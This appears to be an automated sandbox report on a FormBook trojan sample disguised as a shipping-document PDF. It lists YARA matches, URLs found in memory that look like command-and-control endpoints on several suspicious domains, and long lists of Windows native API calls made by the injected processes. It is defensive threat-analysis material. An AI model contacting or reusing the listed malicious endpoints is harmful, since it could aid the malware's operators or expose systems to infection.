70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: rasdial.exe, 00000005.00000002.4551985733.000000000579C000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.000000000348C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://animekuid.xyz/7u36/?2Zv0=qtmpl4wh&FbuX5DnP=RRg0VWAgukFyDCcWaOUK9J2JRQGKN1ekxOnlJwT3H1aqQkfKCZ
            Source: rasdial.exe, 00000005.00000002.4551985733.000000000560A000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.00000000032FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://patioprojex.africa/iv79/?FbuX5DnP=aYGuHzYMPqEvnYXTlDqrzWS6BBG
            Source: fWXPcgRbOhi.exe, 00000007.00000002.4553080384.0000000004F1B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lanxuanz.tech
            Source: fWXPcgRbOhi.exe, 00000007.00000002.4553080384.0000000004F1B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lanxuanz.tech/1q08/
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rasdial.exe, 00000005.00000002.4551985733.00000000052E6000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.0000000002FD6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://jino.ru
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000005.00000002.4550647811.0000000002B24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rasdial.exe, 00000005.00000003.2708154224.000000000789D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: rasdial.exe, 00000005.00000002.4551985733.0000000005DE4000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.0000000003AD4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bayarcepat19.click/g48c/?2Zv0=qtmpl4wh&FbuX5DnP=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehsl
            Source: rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: z4Shipping_document_pdf.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C4B3 NtClose,2_2_0042C4B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,2_2_033735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B60 NtClose,LdrInitializeThunk,2_2_03372B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03372DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03372C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374340 NtSetContextThread,2_2_03374340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373010 NtOpenDirectoryObject,2_2_03373010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373090 NtSetValueKey,2_2_03373090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374650 NtSuspendThread,2_2_03374650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BA0 NtEnumerateValueKey,2_2_03372BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B80 NtQueryInformationFile,2_2_03372B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BF0 NtAllocateVirtualMemory,2_2_03372BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BE0 NtQueryValueKey,2_2_03372BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AB0 NtWaitForSingleObject,2_2_03372AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AF0 NtWriteFile,2_2_03372AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AD0 NtReadFile,2_2_03372AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033739B0 NtGetContextThread,2_2_033739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F30 NtCreateSection,2_2_03372F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F60 NtCreateProcessEx,2_2_03372F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FB0 NtResumeThread,2_2_03372FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FA0 NtQuerySection,2_2_03372FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F90 NtProtectVirtualMemory,2_2_03372F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FE0 NtCreateFile,2_2_03372FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E30 NtWriteVirtualMemory,2_2_03372E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EA0 NtAdjustPrivilegesToken,2_2_03372EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E80 NtReadVirtualMemory,2_2_03372E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EE0 NtQueueApcThread,2_2_03372EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D30 NtUnmapViewOfSection,2_2_03372D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D10 NtMapViewOfSection,2_2_03372D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D10 NtOpenProcessToken,2_2_03373D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D00 NtSetInformationFile,2_2_03372D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03373D70 NtOpenThread,2_2_03373D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DB0 NtEnumerateKey,2_2_03372DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DD0 NtDelayExecution,2_2_03372DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C00 NtQueryInformationProcess,2_2_03372C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C60 NtCreateKey,2_2_03372C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CA0 NtQueryInformationToken,2_2_03372CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CF0 NtOpenProcess,2_2_03372CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CC0 NtQueryVirtualMemory,2_2_03372CC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B35C0 NtCreateMutant,LdrInitializeThunk,5_2_047B35C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B4650 NtSuspendThread,LdrInitializeThunk,5_2_047B4650
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B4340 NtSetContextThread,LdrInitializeThunk,5_2_047B4340
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_047B2C70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2C60 NtCreateKey,LdrInitializeThunk,5_2_047B2C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_047B2CA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_047B2D30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_047B2D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_047B2DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2DD0 NtDelayExecution,LdrInitializeThunk,5_2_047B2DD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_047B2EE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_047B2E80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2F30 NtCreateSection,LdrInitializeThunk,5_2_047B2F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2FE0 NtCreateFile,LdrInitializeThunk,5_2_047B2FE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2FB0 NtResumeThread,LdrInitializeThunk,5_2_047B2FB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B39B0 NtGetContextThread,LdrInitializeThunk,5_2_047B39B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2AF0 NtWriteFile,LdrInitializeThunk,5_2_047B2AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2AD0 NtReadFile,LdrInitializeThunk,5_2_047B2AD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2B60 NtClose,LdrInitializeThunk,5_2_047B2B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_047B2BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_047B2BE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_047B2BA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B3010 NtOpenDirectoryObject,5_2_047B3010
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B3090 NtSetValueKey,5_2_047B3090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2C00 NtQueryInformationProcess,5_2_047B2C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2CF0 NtOpenProcess,5_2_047B2CF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2CC0 NtQueryVirtualMemory,5_2_047B2CC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B3D70 NtOpenThread,5_2_047B3D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B3D10 NtOpenProcessToken,5_2_047B3D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2D00 NtSetInformationFile,5_2_047B2D00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2DB0 NtEnumerateKey,5_2_047B2DB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2E30 NtWriteVirtualMemory,5_2_047B2E30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2EA0 NtAdjustPrivilegesToken,5_2_047B2EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2F60 NtCreateProcessEx,5_2_047B2F60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2FA0 NtQuerySection,5_2_047B2FA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2F90 NtProtectVirtualMemory,5_2_047B2F90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2AB0 NtWaitForSingleObject,5_2_047B2AB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B2B80 NtQueryInformationFile,5_2_047B2B80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02829060 NtAllocateVirtualMemory,5_2_02829060
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02828E70 NtDeleteFile,5_2_02828E70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02828F10 NtClose,5_2_02828F10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02828C20 NtCreateFile,5_2_02828C20
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02828D80 NtReadFile,5_2_02828D80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004018862_2_00401886
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185032_2_00418503
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004018CD2_2_004018CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A7C2_2_00402A7C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EAC32_2_0042EAC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032F02_2_004032F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A802_2_00402A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024FC2_2_004024FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FD4A2_2_0040FD4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FD532_2_0040FD53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025002_2_00402500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004166D32_2_004166D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026F02_2_004026F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402EB02_2_00402EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF732_2_0040FF73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DFF32_2_0040DFF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F132D2_2_033F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA3522_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D34C2_2_0332D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0338739A2_2_0338739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034003E62_2_034003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F02_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E02742_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033452A02_2_033452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E12ED2_2_033E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B2C02_2_0335B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA1182_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340B16B2_2_0340B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033301002_2_03330100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332F1722_2_0332F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337516C2_2_0337516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C81582_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334B1B02_2_0334B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034001AA2_2_034001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F81CC2_2_033F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F70E92_2_033F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF0E02_2_033FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EF0CC2_2_033EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C02_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033407702_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033647502_2_03364750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF7B02_2_033FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C02_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C6E02_2_0335C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F16CC2_2_033F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033405352_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F75712_2_033F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DD5B02_2_033DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034005912_2_03400591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FF43F2_2_033FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033314602_2_03331460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F24462_2_033F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EE4F62_2_033EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFB762_2_033FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB402_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FB802_2_0335FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B5BF02_2_033B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337DBF92_2_0337DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F6BD72_2_033F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B3A6C2_2_033B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFA492_2_033FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7A462_2_033F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DDAAC2_2_033DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03385AA02_2_03385AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA802_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EDAC62_2_033EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033569622_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033499502_2_03349950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B9502_2_0335B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A02_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340A9A62_2_0340A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD8002_2_033AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033428402_2_03342840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334A8402_2_0334A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033268B82_2_033268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E8F02_2_0336E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033438E02_2_033438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360F302_2_03360F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03382F282_2_03382F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFF092_2_033FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4F402_2_033B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFFB12_2_033FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341F922_2_03341F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334CFE02_2_0334CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332FC82_2_03332FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEE262_2_033FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340E592_2_03340E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03349EB02_2_03349EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352E902_2_03352E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FCE932_2_033FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FEEDB2_2_033FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334AD002_2_0334AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F7D732_2_033F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F1D5A2_2_033F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03343D402_2_03343D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03358DBF2_2_03358DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333ADE02_2_0333ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335FDC02_2_0335FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B9C322_2_033B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340C002_2_03340C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0CB52_2_033E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330CF22_2_03330CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FFCF22_2_033FFCF2
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_0399396F4_2_0399396F
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_039958EF4_2_039958EF
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_0399C04F4_2_0399C04F
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_039956CF4_2_039956CF
